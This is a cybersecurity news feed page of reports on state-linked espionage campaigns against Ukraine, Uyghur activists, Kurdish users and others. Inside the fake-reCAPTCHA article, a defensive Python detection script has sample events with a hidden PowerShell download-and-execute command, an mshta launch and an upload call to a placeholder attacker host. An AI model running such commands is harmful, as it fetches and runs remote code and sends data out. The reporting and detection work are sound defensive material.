Espionage - The Cyber Express: Trending Cybersecurity News, Updates, Magazine and More.
- Ukrainian Government Systems Targeted With Backdoors Hidden in Cloud APIs and Docs by Mihir Bagwe on June 23, 2025 at 12:19 pm

Russia-linked hackers are back at it again, this time with upgraded tools and a stealthier playbook targeting Ukrainian government systems. Ukraine's national Computer Emergency Response Team has linked a recent cyberattack campaign against the information and communication system (ICS) of a government entity to UAC-0001, also known as APT28 or Fancy Bear, the infamous hacking group believed to be operated by Russia's GRU military intelligence service.

In an investigation conducted between March and May 2024, cybersecurity responders uncovered two previously unseen malware strains, BEARDSHELL and SLIMAGENT, lurking inside government systems. The attackers also deployed a component of the widely known COVENANT command-and-control framework, hidden inside a document titled "Act.doc" and sent via the encrypted messaging app Signal.

While the initial infection vector wasn't immediately clear, analysts later discovered the malware reached its target using a macro-laced Word document that installed multiple payloads, each designed to fly under the radar, exploit trusted services, and maintain persistence through registry hijacking and scheduled tasks.

How the Intrusion Worked Against Ukrainian Government Systems

The attackers disguised their malware inside a seemingly benign Word file delivered over Signal.

Image: Sample of communication with an attacker in Signal (Source: CERT-UA)

If a user enabled macros, the document executed code that placed two files on the system and set up a COM-hijacking registry entry that hijacked explorer.exe to silently launch a malicious DLL. That DLL then decrypted another file (windows.png) containing shellcode that finally triggered the launch of the COVENANT malware framework, all without dropping anything directly visible to the user.

COVENANT, a .NET-based red team tool popular in the post-exploitation phase of cyberattacks, was used here to download and execute PlaySndSrv.dll and a WAV file (sample-03.wav), which contained encoded instructions to ultimately launch BEARDSHELL, a custom-built backdoor. Persistence? Also covered. BEARDSHELL maintained access through a separate registry entry tied to a scheduled task under Microsoft's SystemSoundsService. Classic APT28.

What Do BEARDSHELL and SLIMAGENT Actually Do?

Both malware tools were written in C++ and designed for stealth and data collection:

- BEARDSHELL connects to the attacker using the API of Icedrive, a legitimate cloud storage provider, allowing the malware to receive encrypted PowerShell scripts and exfiltrate data without triggering traditional security tools. Each infected system gets its own directory, named using a unique hash derived from hardware and system identifiers.
- SLIMAGENT takes periodic screenshots and encrypts them using AES + RSA, saving them locally in a time-stamped format. It's the visual spy in the room, quietly recording the screen without alerting the user.

What's particularly clever, and dangerous, about both tools is their use of legitimate services (Koofr and Icedrive) as command-and-control (C2) infrastructure. This means they avoid sketchy IP addresses and domains, making traditional threat intel blacklists nearly useless.

Why It Matters

This latest campaign isn't just another cyberattack; it's part of an escalating pattern of hybrid warfare tactics employed by Russia since the start of its war in Ukraine. APT28, which has been tied to the DNC email leaks in 2016, Olympic Destroyer in 2018, and countless attacks on NATO and EU institutions, is one of the Kremlin's most active cyber units.

Their tactics have evolved. Instead of brute-forcing their way into systems, they now leverage phishing documents, encrypted messaging apps like Signal for payload delivery, and trusted APIs for communication. And they're still targeting the same kind of critical government infrastructure they've always sought to undermine. According to CERT-UA, the malware was identified inside a central government executive body's information systems, a clear sign that the group is targeting the upper echelons of Ukraine's state apparatus.

Defense, Detection, and the Cloud API Problem

CERT-UA is urging security teams, particularly within governments and critical infrastructure, to closely monitor traffic to app.koofr.net and api.icedrive.net, as these are being used as C2 endpoints. The advisory also noted that the success of the attack hinged on:

- Users enabling macros in Office documents
- Host security tools failing to monitor Signal-based delivery
- The abuse of trusted services like Icedrive and Koofr as "invisible" control channels

It's another wake-up call: endpoint defenses can't rely on static indicators. Malware is now using your everyday apps, cloud platforms, and registry entries to hide in plain sight.

The Bigger Picture

APT28 has always stayed ahead of the curve, and this campaign is no exception. By chaining together macro payloads, registry hijacking, cloud C2, and multi-stage execution, the group isn't just adapting. It's evolving. And while these attacks may seem targeted at Ukraine, the tactics, techniques, and procedures (TTPs) on display should concern every government and enterprise organization in the West. Because if a Word doc, a PNG, and a WAV file can bypass your defenses, what else is already lurking inside?
- Russian GRU Is Hacking IP Cameras and Logistics Firms to Spy on Aid Deliveries from Western Allies to Ukraine by Mihir Bagwe on May 21, 2025 at 4:56 pm

In a joint cybersecurity advisory issued today, U.S. and allied intelligence agencies confirmed what many threat analysts have long suspected: the Russian GRU military intelligence agency is systematically targeting the digital backbone of logistics and transportation providers across Europe and North America.

The campaign, detailed in a 25-page report from the NSA, FBI, CISA, and partners from 10 countries, including the U.K., Australia, and Germany, spotlights a coordinated cyber espionage effort by GRU's Unit 26165, more widely recognized in the threat intel world as APT28, Fancy Bear, or Forest Blizzard.

Targets at the center of the campaign were freight operators, rail networks, air traffic systems, and cloud tech vendors: anyone with a role in getting military and humanitarian aid to Ukraine. Targets have included organizations in 14 countries, including IP cameras in Hungary, a Russian ally.

Russian GRU Campaign: Not Just Malware, Surveillance Too

What stands out in the report is the scale and creativity of the GRU's tactics. The hackers aren't just hijacking email servers or pushing trojans. They're hacking into IP cameras, too, 10,000 of them, to be exact, mostly around Ukrainian borders, using weak credentials and exposed RTSP services to turn physical surveillance into digital eyes on the ground.

Image: List of countries where IP cameras were targeted. (Source: defense.gov)

In parallel, GRU operators launched targeted intrusions on shipping and logistics companies, exploiting familiar weaknesses like unpatched Exchange servers, WinRAR bugs (CVE-2023-38831), and Outlook NTLM leaks (CVE-2023-23397). The aim was stealing shipment manifests, routing info, and sensitive business data that could tip off troop or equipment movement.

The combination of shipping data theft and compromised video feeds likely gives attackers real-time visibility into what's moving, where, and when. It's tactical intelligence collection at enterprise scale.

The GRU Malware Stack

The HEADLACE backdoor, first reported by IBM X-Force during the Israel-Hamas conflict, was found embedded in malicious shortcut files. Once activated, it initiated headless browser sessions to exfiltrate stolen data, clear logs, and maintain access.

MASEPIE, a Python-based backdoor, offered remote shell access, file transfers, and command execution capabilities, often disguised as routine background processes. Another tool, STEELHOOK, enabled credential harvesting from browsers like Chrome and Edge by decrypting stored passwords using PowerShell-based techniques.

The actors also employed LOLBins, legitimate system tools like ntdsutil, wevtutil, and ADExplorer, to evade detection and live off the land. In one case, GRU hackers gained control of an ICS vendor's email platform, then pivoted to compromise customers in the railway sector. In another, they used stolen credentials and MFA fatigue techniques to access VPN infrastructure at a shipping company.

What the Russian GRU Wants

This isn't a smash-and-grab ransomware operation. It's long-term surveillance: the kind of campaign that's designed to persist, quietly gather intelligence, and interfere only when necessary. And while the report doesn't explicitly name any targets by company, the industries hit hardest, logistics, transportation, and defense-adjacent vendors, are the same ones that move military hardware, humanitarian supplies, and critical infrastructure parts into conflict zones.

The big concern? These compromised networks could give Russia a battlefield edge: intercepting aid, sabotaging supply lines, or simply watching to see how the West moves.

How Companies Should Respond

The advisory includes a laundry list of technical mitigations, including:

- Blocking known C2 infrastructure
- Hardening VPN and email access
- Reconfiguring exposed IP cameras
- Patching known exploited vulnerabilities (especially in Outlook, Exchange, and WinRAR)
- Monitoring PowerShell use and system tool abuse

But there's also a broader message: if you're in the logistics or defense supply chain, and especially if you support Ukraine, even indirectly, you're already a target. Organizations in these sectors should assume compromise and act accordingly, the advisory suggests.

The Big Picture

Russia's digital playbook in Ukraine is evolving. While early campaigns relied on headline-grabbing wipers and power grid attacks, the new frontier is far more strategic, and far more subtle. What we're seeing now is cyberwar as surveillance: fewer fireworks, more cameras. The GRU isn't just breaking things; it's watching, learning, and waiting. And for companies moving cargo or manufacturing gear with ties to conflict zones, that means cybersecurity is no longer just a compliance issue. It's operational security. It's national security.
- Türkiye-linked Hackers Exploit Output Messenger Zero-Day in Targeted Espionage Campaign by Mihir Bagwe on May 12, 2025 at 6:39 pm

When a zero-day flaw surfaces in an enterprise tool that no one talks about publicly, it's tempting to write it off as niche. But Marbled Dust's recent campaign exploiting CVE-2025-27920 in Output Messenger is anything but.

Microsoft Threat Intelligence has linked a string of targeted cyberattacks to Marbled Dust, a Türkiye-affiliated threat actor, using a previously unknown vulnerability in Output Messenger, a self-hosted enterprise chat app. The campaign, ongoing since April 2024, targeted Kurdish military-linked users in Iraq and reflects a growing shift in how regionally motivated cyber-espionage unfolds.

Output Messenger: The Tool You Didn't Expect to Matter

Output Messenger isn't WhatsApp or Slack. It's a low-profile, multiplatform chat tool often used by organizations looking for on-prem communication. That makes it a perfect blind spot: not widely scrutinized, but widely trusted within internal networks. Marbled Dust saw the opportunity and pounced.

The attackers used CVE-2025-27920, a directory traversal flaw in Output Messenger Server Manager, to plant malicious scripts in the startup folder. From there, they executed a stealthy multi-stage backdoor deployment, with exfiltration domains and C2 infrastructure cleverly masked under seemingly benign domains like api.wordinfos[.]com.

Microsoft credits Srimax, Output Messenger's vendor, for releasing timely patches (v2.0.62+), but many organizations are still unpatched. That's where Marbled Dust gets its access.

Inside the Marbled Dust Attack Chain

The campaign starts with Marbled Dust gaining authenticated access to Output Messenger's Server Manager. Microsoft isn't entirely sure how those credentials are initially harvested, but suspects DNS hijacking and typo-squatted login portals, tactics the group has used before.

Image: Marbled Dust Attack Chain (Source: Microsoft Threat Intelligence)

Once in, the threat actor uploads a malicious VBS file to the Windows startup folder, exploiting the directory traversal bug. This script launches OMServerService.exe, a GoLang backdoor disguised as a legitimate service file. GoLang offers a bonus: platform agnosticism and fewer signature-based detections.

The backdoor connects to Marbled Dust's C2 domain, checks connectivity, sends host data, and then executes further commands based on what the attacker sends back. In one case, a victim's device was seen uploading sensitive files packaged in a RAR archive using PuTTY's command-line client, plink.exe, as the data exfiltration vehicle.

On the client side, users who downloaded infected Output Messenger installers got more than they expected. The installer bundled the legit OutputMessenger.exe with a secondary payload, OMClientService.exe, another GoLang backdoor pinging the same C2 endpoint.

Who Is Marbled Dust?

Microsoft links Marbled Dust to past DNS hijacking and credential-harvesting campaigns. The group overlaps with activity known as Sea Turtle (APT) and UNC1326, and has been observed targeting organizations with interests adverse to Ankara's. Their focus areas include the Middle East and Europe, with recent emphasis on telecom and government sectors.

This campaign signals a shift. While earlier Marbled Dust activity relied on known vulnerabilities, the use of a true zero-day suggests either growing internal capabilities or increased urgency in their operational objectives.

Why the Output Messenger Exploit Matters

This is a lesson in how fringe enterprise tools can become high-value targets. While most security teams are busy patching the usual suspects (Office macros, web proxies, VPNs), tools like Output Messenger quietly hum along in the background, until someone like Marbled Dust takes interest.

And let's be clear: this isn't a commodity threat. It's regional espionage with carefully picked targets and minimal noise. The entire campaign operated with precision, focused on credential theft, internal surveillance, and quiet access, not ransomware or mass disruption.

What You Should Do Now

Microsoft urges immediate patching of Output Messenger to versions 2.0.62 (server) and 2.0.63 (client). Organizations using this app should:

- Audit all current installations for signs of the exploit (look for unusual VBS and EXE files in startup directories)
- Monitor outbound connections to api.wordinfos[.]com
- Check for unauthorized use of plink.exe or outbound SSH sessions
- Isolate any systems communicating with suspicious C2 infrastructure

Marbled Dust's campaign isn't about splashy headlines. It's quiet, focused, and a warning shot to organizations using obscure enterprise software without hardening it. Zero-days don't just live in browsers and VPNs anymore. They live in your internal chat apps, your ticketing systems, the software you forgot to watch. And attackers? They're watching all of it.
- Trojanized Text Editor Software Used in Targeted Uyghur Spy Campaign by Mihir Bagwe on April 28, 2025 at 5:48 pm

A trusted tool has turned traitor. A new Citizen Lab investigation reveals that UyghurEditPP, a legitimate open-source Uyghur-language text editor, has been weaponized to spy on members of the World Uyghur Congress (WUC). The attack, uncovered in March 2025, shows how threat actors have now shifted to exploiting trusted cultural tools to launch cyber-espionage campaigns against diaspora communities.

The attack started the old-fashioned way: with an email. WUC members received a spearphishing message posing as a partner organization. It offered what seemed like an innocuous task: download and test a Uyghur-language software tool. The email contained a Google Drive link to a password-protected archive. Inside? A booby-trapped version of UyghurEditPP.

The trojanized app looked and behaved like the real deal, right down to its interface. But hidden under the hood, it deployed malware designed to quietly burrow into the victims' systems. Once installed, it could scoop up system information, upload or download files, and even run custom plugins for more complex operations.

A Custom Backdoor with a Uyghur Disguise

Citizen Lab's technical teardown showed that the malware communicated with its command-and-control (C2) servers using domains like tengri.ooguy.com and anar.gleeze.com, borrowing heavily from Central Asian cultural references. These servers were hosted inside a cloud provider known for lax controls and frequent abuse by cybercriminals.

Adding to the deception were servers that presented fake TLS certificates impersonating Microsoft. It's a clever ploy: browsers and security software often treat familiar certificates with less suspicion, helping the malicious traffic fly under the radar.

Not Just a One-Off: Evidence of Long-Term Planning

This wasn't a quick-and-dirty operation. The attackers set up websites like gheyret.com and gheyret.net, designed to look like they belonged to Uyghur software developers. They even faked download pages for UyghurEditPP to make the malicious file seem legitimate. Citizen Lab researchers believe the campaign reflects a high level of planning and resource investment, likely showing a long-term commitment to infiltrating Uyghur communities through digital means.

Bigger Than One Organization

While this particular campaign targeted WUC, it's part of a broader pattern of digital transnational repression. Over the past decade, multiple investigations have documented attempts to harass, monitor, and silence Uyghur activists and dissidents abroad.

The methods vary. From phishing attacks and spyware campaigns to social engineering and disinformation, threat actors have consistently adapted their tactics. The latest twist, weaponizing culturally significant software, is a troubling evolution. By hijacking trusted tools, attackers erode the very foundations of community trust. It's akin to someone weaponizing your own language. It's psychological warfare, not just technical.

"Targets have reported experiencing feelings of insecurity, guilt, fear, uncertainty, mental and emotional distress, and burnout from these attacks," the Citizen Lab researchers said, based on earlier similar investigations.

Inside the Malware's Playbook

According to Citizen Lab's technical findings, the backdoor bundled with UyghurEditPP was no ordinary spyware. It featured modular plugins, allowing attackers to tailor their operations based on the target. Among its core capabilities:

- System profiling: Collects information about the infected device
- File operations: Uploads, downloads, and executes files
- Command execution: Runs arbitrary system commands on demand
- Custom plugins: Expands functionality without redeploying new malware

By blending legitimate software functionality with covert surveillance capabilities, the attackers achieved a potent balance of usability and stealth.

Attribution: A Familiar Playbook, An Unknown Actor

Citizen Lab stopped short of directly attributing the attack to a known government or hacking group. However, the techniques, targets, and infrastructure bear a strong resemblance to past China-aligned cyber operations aimed at Uyghur individuals and organizations. This campaign's sophistication suggests access to considerable resources and a deep understanding of Uyghur cultural dynamics, both hallmarks of state-sponsored cyber-espionage.

Digital Safety Lessons for At-Risk Communities

The WUC attack is a wake-up call not just for Uyghur activists but for every marginalized or targeted community online. Trust, once broken, is hard to rebuild. Software, even familiar, open-source tools, must now be treated with a layer of healthy skepticism. Citizen Lab advises:

- Verify downloads: Always source software directly from official repositories, not third-party links.
- Use endpoint protection: Invest in reputable antivirus and behavior-monitoring tools.
- Employ two-factor authentication: Harder for attackers to hijack accounts, even with malware present.
- Stay updated: Keep systems patched and subscribe to cybersecurity advisories relevant to your community.

The Personal Cost of Cyber-Conflict

Cyberattacks like this one aren't just technical skirmishes. They're personal. They target trust, language, identity: the invisible threads that hold communities together. Weaponizing UyghurEditPP shows a level of creativity and cruelty. It's a digital assault on an already persecuted community, designed to monitor, intimidate, and ultimately control.

As this campaign shows, defending against cyberthreats isn't just about firewalls and patches. It's also about defending culture, community, and the very right to communicate safely.
- China Names Four Hackers of Taiwan's Cyber Army Targeting Beijing Critical Infrastructure by Mihir Bagwe on March 18, 2025 at 8:04 pm

China has accused four Taiwanese individuals of being hackers associated with Taiwan's military cyber force, claiming they were responsible for cyberattacks against Beijing. The Ministry of State Security (MSS) identified them as members of Taiwan's Information, Communications, and Electronic Force Command (ICEFCOM), publishing their names, photographs, birthdates, and job titles. The accusations add another layer of tension to relations between the two sides, which remain hostile.

China's Allegations Against Taiwan's ICEFCOM

According to China's MSS, ICEFCOM has been involved in cyberattacks targeting China's critical infrastructure. The ministry stated that Taiwan's cyber force, also known as the "Internet Army," has been working with external hackers and cybersecurity firms to launch cyber espionage and infiltration campaigns. "Their activities include espionage, sabotage, and propaganda," the MSS said.

Since its establishment, ICEFCOM has conducted targeted cyberattacks and infiltration operations against critical Chinese infrastructure, the MSS stated in an official release. China claimed that the attacks focused on systems controlling waterworks, power grids, telecommunications networks, and surveillance cameras, aiming to disrupt national stability.

The MSS also accused ICEFCOM of attempting to breach databases containing sensitive information on Chinese citizens, government officials, and military operations. Beijing labeled these activities as part of Taiwan's broader intelligence-gathering efforts, allegedly backed by foreign entities.

Taiwan Rejects Claims, Calls China the Real Cyber Aggressor

Taiwan's Ministry of National Defense swiftly rejected China's accusations, calling them an attempt to shift blame. Taiwan has repeatedly stated that its cyber units focus on defensive measures rather than offensive operations. The military's cybersecurity forces do not engage in cyberattacks, Taiwan's defense ministry said in a statement. Taipei accused Beijing of fabricating claims to justify its own cyber activities against Taiwan.

Taiwan recently released its own report detailing Beijing's cyber tactics over the past year. Taiwan's National Security Bureau (NSB) stated that cyberattacks against Taiwan's government departments averaged 2.4 million per day in 2024. The report suggested that China's state-sponsored hackers have been refining their cyber warfare techniques to exert political and economic pressure on Taipei.

China's Cyberattack Techniques in 2024

Taiwan's NSB report outlined the key methods China used in its cyber operations throughout 2024. The tactics ranged from phishing campaigns to large-scale data breaches designed to compromise government and military networks.

One of the primary strategies involved Advanced Persistent Threat (APT) groups linked to the Chinese government. These groups infiltrated Taiwanese organizations using malware-laced emails and trojanized software updates. Some of the most sophisticated attacks targeted supply chain vendors, allowing hackers to bypass traditional security measures and infiltrate government networks undetected.

China also leveraged artificial intelligence (AI)-driven cyber tools to automate large-scale attacks. AI-enhanced malware adapted in real time, making it harder for cybersecurity teams to detect and neutralize threats. The NSB report noted that China's hackers used generative AI models to craft realistic phishing emails that closely mimicked official government communications, deceiving even experienced professionals.

Another concerning development was China's increasing use of zero-day exploits: previously unknown software vulnerabilities that hackers used before they could be patched. Beijing's cyber units deployed these exploits against Taiwan's critical infrastructure, targeting national defense systems, financial institutions, and telecom providers.

Growing Cyber Conflict Between Beijing and Taipei

Taiwan has long been a focal point of Chinese cyber operations, but the scale and sophistication of attacks in 2024 marked a significant escalation following the physical tensions between the two nations. Chinese hackers reportedly infiltrated multiple Taiwanese defense contractors, attempting to extract classified military research and technology blueprints.

The growing cyber conflict has also impacted Taiwan's private sector. The NSB noted that Chinese threat actors carried out ransomware attacks against Taiwanese semiconductor firms, aiming to disrupt one of the world's most crucial industries. Additionally, Beijing allegedly sought to manipulate Taiwanese social media platforms, spreading disinformation to sway public opinion ahead of key political events.

With China publicly accusing Taiwan of cyberattacks and Taiwan providing detailed evidence of Beijing's own operations, tensions in cyberspace continue to rise. Both nations remain locked in a digital conflict where information warfare plays a crucial role in their broader geopolitical struggle.

China's allegations against Taiwan come amid an increasingly hostile landscape in the Asia-Pacific region. While Beijing has labeled Taiwan's ICEFCOM as a cyber threat, Taipei maintains that China is the real aggressor, orchestrating millions of daily attacks. Taiwan's latest findings reveal that China's cyber capabilities are evolving rapidly, incorporating AI, zero-day exploits, and supply chain attacks to gain strategic advantages. As cyberwarfare becomes a critical battleground, both nations are likely to continue investing in offensive and defensive cyber capabilities, experts suggest.
- Russian Star Blizzard is Now After Your WhatsApp Data by Mihir Bagwe on January 17, 2025 at 10:47 am

After researchers and national cybersecurity agencies revealed key details of the Russia-linked Star Blizzard threat actor in recent days, the group has added a new attack vector to its arsenal, one that targets victims' WhatsApp data. Microsoft's Threat Intelligence team spotted the campaign late last year, leveraging the topic of support to Ukrainian NGOs in the face of the ongoing war.

Star Blizzard, also tracked as Callisto, SEABORGIUM, or COLDRIVER, is run by Russia's FSB or secret service officers, according to previous attribution. The group is famously known for its targeted spear-phishing campaigns against high-profile targets in the U.S. and U.K., where they have targeted dozens of journalists, think tanks, and non-governmental organizations that support Ukraine and its allies.

Star Blizzard Shifts Focus to WhatsApp Data

Historically, the threat actor is known to use phishing campaigns for initial infection. But detailed advisories from independent cybersecurity firms like Microsoft's Threat Intelligence team and agencies like the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which exposed the TTPs of this threat actor, have likely forced the group to change its tradecraft to evade detection.

Star Blizzard has now modified its spear-phishing campaign to target the WhatsApp accounts of its victims rather than their computer data. This is the first time that the threat actor has adopted a new technique, researchers said.

The threat actor initiates contact via email, engaging targets before sending a follow-up email with a malicious link. The sender address impersonates a U.S. government official, consistent with Star Blizzard's tactic of mimicking political or diplomatic figures to boost credibility.

Image: Initial Spear-Phishing mail from Star Blizzard (Credit: MSTIC)

The initial email includes a QR code claiming to direct users to a WhatsApp group focused on supporting Ukraine NGOs. However, the QR code is intentionally broken to prompt the recipient to respond. Upon response, the threat actor sends a second email containing a Safe Links-wrapped t[.]ly shortened link as an alternative to join the group. Following this link redirects the target to a page instructing them to scan a QR code to join the group.

In reality, the QR code connects the victim's WhatsApp account to the threat actor's device via WhatsApp Web. This grants the attacker access to the victim's messages, enabling data exfiltration through browser plugins designed for exporting WhatsApp messages.

Microsoft noted that although the campaign ended in November 2024, people and organizations, especially those related to government or diplomacy, defense, research, and assistance to Ukraine in the ongoing conflict with Russia, need to be vigilant and educated about this change in tactics.

"We are sharing our information on Star Blizzard's latest activity to raise awareness of this threat actor's shift in tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity," Microsoft said.
- âIâm not a Robotâ reCAPTCHA Trojanized by Russian Hackers to Target Local Ukrainian Governmentby Mihir Bagwe on October 25, 2024 at 5:36 pm
Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU)-connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard, a new technique for delivering malware with minimal interaction.

Google’s reCAPTCHA Lookalike

Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user’s clipboard. Following this, instructions prompt users to press “Win+R,” which opens the command prompt, followed by “Ctrl+V” to paste and then “Enter” to execute it. Once executed, the payload launches, compromising the system.

The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA)

APT28’s tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects involves the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly popular among threat actors.

Fancy Bear Gets Fancy with Its Expanding Arsenal

This isn’t the first time Ukrainian entities have faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data.

The malicious scripts run post Roundcube vulnerability exploitation (Source: CERT-UA)

Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout for increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks.
Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats

Indicators of Compromise Shared by CERT-UA

CERT-UA’s advisory lists the File Hashes, Network and Hosts indicators for this campaign, together with the Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes).
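To show the detection side of the clipboard-to-Run-dialog lure described in this article, here is an added example (not CERT-UA’s or The Cyber Express’s code) that scores process-creation events for the traits CERT-UA describes: a hidden, profile-less, policy-bypassing PowerShell launched under explorer.exe (assumed here to be the Run dialog’s host process), a remote download cradle or an mshta launch from a URL, and the fake-CAPTCHA text tucked behind a trailing comment. The sample events, the event field layout and the domain attacker.example are all constructed for the example.

```python
"""Triage process-creation events for the "paste this into Win+R" lure.

Added example, not CERT-UA's or The Cyber Express's code. Assumptions: the
Run dialog is hosted by explorer.exe, so a command pasted into it runs with
explorer.exe as parent; event fields mirror a typical EDR/Sysmon process
record; every sample event below is constructed (attacker.example is a
reserved placeholder, not real infrastructure)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


@dataclass(frozen=True)
class Finding:
    hits: tuple         # names of the rules that matched
    verdict: str        # "suspicious" or "ok"


# Interpreters a Run-dialog lure typically hands the pasted command to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Each rule is (name, regex over the command line). Together they encode the
# traits the article describes: hidden window, no profile, execution-policy
# bypass, a remote download cradle, Invoke-Expression, mshta fed a URL, and a
# trailing '#' comment carrying the "I am not a robot" text the fake CAPTCHA
# shows so the pasted line looks harmless in the Run box.
RULES = (
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I)),
    ("exec_bypass", re.compile(r"-e(?:x|xec|xecutionpolicy|p)\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|invoke-restmethod|invoke-webrequest"
        r"|net\.webclient|\biwr\b|\birm\b", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("mshta_url", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I)),
    ("captcha_lure_comment",
     re.compile(r"#.*(?:not a robot|recaptcha|verif)", re.I)),
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> Finding:
    """Score one event; several traits together are what make it a lure."""
    hits = [name for name, rx in RULES if rx.search(event.command_line)]
    if (_basename(event.parent_image) == "explorer.exe"
            and _basename(event.image) in INTERPRETERS):
        hits.append("launched_from_run_dialog")
    remote_payload = "download_cradle" in hits or "mshta_url" in hits
    suspicious = (
        len(hits) >= 3
        or ("launched_from_run_dialog" in hits and remote_payload)
        or "captcha_lure_comment" in hits
    )
    return Finding(tuple(hits), "suspicious" if suspicious else "ok")


def triage(events) -> list:
    """Return (index, hits) for every event that needs analyst attention."""
    flagged = []
    for i, event in enumerate(events):
        finding = analyze(event)
        if finding.verdict == "suspicious":
            flagged.append((i, finding.hits))
    return flagged


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 0. The pasted lure: hidden PowerShell from the Run dialog, download
    #    cradle, mshta launch, and CAPTCHA text behind a '#' comment.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -WindowStyle Hidden -nop -exec bypass -c '
                 '"iex (New-Object Net.WebClient).DownloadString('
                 "'https://attacker.example/B');mshta https://attacker.example/b "
                 '# \'I am not a robot - reCAPTCHA ID: 0000\'"'),
    # 1. Routine admin script: bypass and no-profile, but a local file, no
    #    network cradle, and not launched from the Run dialog.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # 2. A user opening a local HTA by hand: Run dialog, but no remote URL.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\VendorApp\setup.hta"'),
    # 3. The follow-on upload stage: not from the Run dialog, but hidden,
    #    no-profile, bypass and a web call to the C2 together still flag it.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -WindowStyle Hidden -nop -exec bypass -c '
                 '"Invoke-RestMethod -Uri https://attacker.example/upload -Method Post"'),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Only events 0 and 3 are flagged; the admin script and the hand-opened local HTA stay quiet because no single trait is treated as proof on its own.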
- China Says Volt Typhoon Is U.S. Espionage and Disinformation Campaign by Mihir Bagwe on October 15, 2024 at 8:38 pm
Washington’s narrative – corroborated by Microsoft’s findings – of the China-linked Volt Typhoon group is just a cover for U.S. intelligence hacking into Chinese infrastructure, a 60-page report from Beijing’s top cyber defense agency charged. The report, released on Monday by the National Computer Virus Emergency Response Center (CVERC), accused the U.S. government of meticulously crafting a disinformation campaign aimed at both misdirecting attention and maintaining dominance in the global cyber arena. The allegations point to deep-rooted strategies used by the U.S. to perpetuate its cyber espionage activities while blaming adversaries like China and Russia. But behind the noise lies a much more intricate revelation of cyber warfare tactics, including the use of False Flag operations and stealth tools designed to mask the true origins of these attacks, the report alleges.

The ‘Marble’ Toolkit and False Flag Tactics

At the center of the accusations is a U.S. intelligence toolkit that China calls “Marble.” This tool allegedly helps cloak the true source of cyberattacks by obfuscating the coding signatures typically used to trace attackers. What makes Marble particularly dangerous, according to China’s report, is its ability to insert foreign language strings into the malware code, in languages like Mandarin and Russian, to mislead investigators and pin the blame on foreign actors. False Flag operations, a tactic where one country carries out attacks disguised as another, have become central to modern cyber warfare, China said. In the digital realm, this tactic aims to confuse attribution, the process by which investigators link a cyberattack to its origin. With attribution often serving as the basis for geopolitical decisions, misdirection on this scale could have serious consequences.

Influence Operations and Cyber Dominance

